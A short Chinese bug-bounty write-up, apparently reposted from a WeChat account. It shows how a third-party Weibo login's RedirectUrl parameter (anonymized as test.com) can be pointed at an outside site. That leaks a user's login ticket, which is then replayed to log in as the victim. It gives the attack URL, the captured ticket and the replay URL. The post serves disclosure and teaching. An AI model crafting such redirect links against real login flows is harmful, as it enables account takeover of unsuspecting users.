漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞

admin 2024年5月6日07:13:52评论6 views字数 486阅读1分37秒阅读模式

0x00 前言

文章中的项目地址统一修改为: test.com 保护厂商也保护自己

0x01 前期准备

测试微博
测试微博账号:182******77
注:此微博已绑定厂商账号
测试厂商账号:182******77
注:测试微博绑定的就是此账号

0x02 攻击开始

官网: https://passport.test.com

漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞

攻击url: https://passport.test.com/Union/WeiBo?RedirectUrl=http://baidu.com  

然后将此url发给受害者,受害者打开

劫持到的内容: https://www.baidu.com/?ST=NmQxZGU2ZjMtNDk3Ny00YzJhLWI2YjAtYTJjMWI2YWIyYTkx

漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞

漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞

ST = 用户登录凭证,然后将此凭证拼接任意目标站点即可登录

换浏览器打开:http://my.test.com?ST=NmQxZGU2ZjMtNDk3Ny00YzJhLWI2YjAtYTJjMWI2YWIyYTkx

漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞

成功登录此用户

看不懂的文末有彩蛋

原文始发于微信公众号(迪哥讲事):漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月6日07:13:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞http://cn-sec.com/archives/2710432.html

发表评论

匿名网友 填写信息